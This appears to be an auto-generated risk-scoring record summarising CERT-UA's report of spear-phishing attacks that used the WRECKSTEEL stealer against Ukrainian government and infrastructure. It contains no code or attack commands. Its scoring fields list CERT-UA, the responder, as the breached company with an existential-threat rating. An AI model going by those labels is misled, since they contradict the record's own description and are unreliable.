In March 2025, CERT-UA, Ukraine's state computer emergency response team, detected three targeted cyberattacks utilizing WRECKSTEEL malware to exfiltrate sensitive data from government agencies and critical infrastructure. The attacks involved sending spear-phishing emails with malicious links to install VBScript and PowerShell-based versions of the WRECKSTEEL stealer, which searched for and extracted a variety of sensitive file types and took screenshots for reconnaissance and further exploitation. The lack of persistence mechanisms in these tools necessitates immediate reporting of cyber intrusion signs to CERT-UA to initiate protective actions. These incidents underscore the persistent threat landscape facing Ukrainian digital infrastructure in a geopolitically tense environment.
TPRM report: https://scoringcyber.rankiteo.com/company/cert-ua
"id": "cer000040525",
"linkid": "cert-ua",
"type": "Breach",
"date": "4/2025",
"severity": "100",
"impact": "5",
"explanation": "Attack threatening the organization’s existence"
{'affected_entities': [{'industry': 'Public Sector',
'location': 'Ukraine',
'name': 'Ukrainian Government Agencies and Critical '
'Infrastructure',
'type': 'Government'}],
'attack_vector': 'Spear-phishing emails with malicious links',
'data_breach': {'data_exfiltration': 'Yes',
'file_types_exposed': 'Variety of sensitive file types',
'sensitivity_of_data': 'High',
'type_of_data_compromised': 'Sensitive file types and '
'screenshots'},
'date_detected': 'March 2025',
'description': "In March 2025, CERT-UA, Ukraine's state computer emergency "
'response team, detected three targeted cyberattacks utilizing '
'WRECKSTEEL malware to exfiltrate sensitive data from '
'government agencies and critical infrastructure. The attacks '
'involved sending spear-phishing emails with malicious links '
'to install VBScript and PowerShell-based versions of the '
'WRECKSTEEL stealer, which searched for and extracted a '
'variety of sensitive file types and took screenshots for '
'reconnaissance and further exploitation. The lack of '
'persistence mechanisms in these tools necessitates immediate '
'reporting of cyber intrusion signs to CERT-UA to initiate '
'protective actions. These incidents underscore the persistent '
'threat landscape facing Ukrainian digital infrastructure in a '
'geopolitically tense environment.',
'impact': {'data_compromised': 'Variety of sensitive file types',
'systems_affected': 'Government agencies and critical '
'infrastructure'},
'initial_access_broker': {'entry_point': 'Spear-phishing emails with '
'malicious links',
'high_value_targets': 'Government agencies and '
'critical infrastructure'},
'lessons_learned': 'Immediate reporting of cyber intrusion signs to CERT-UA '
'is crucial.',
'motivation': 'Data Exfiltration',
'post_incident_analysis': {'corrective_actions': 'Immediate reporting and '
'protective actions',
'root_causes': 'Spear-phishing attacks utilizing '
'WRECKSTEEL malware'},
'recommendations': 'Enhance protective actions and monitoring mechanisms.',
'references': [{'date_accessed': 'March 2025', 'source': 'CERT-UA'}],
'response': {'third_party_assistance': 'CERT-UA'},
'title': 'WRECKSTEEL Malware Attacks on Ukrainian Government Agencies and '
'Critical Infrastructure',
'type': 'Cyber Espionage'}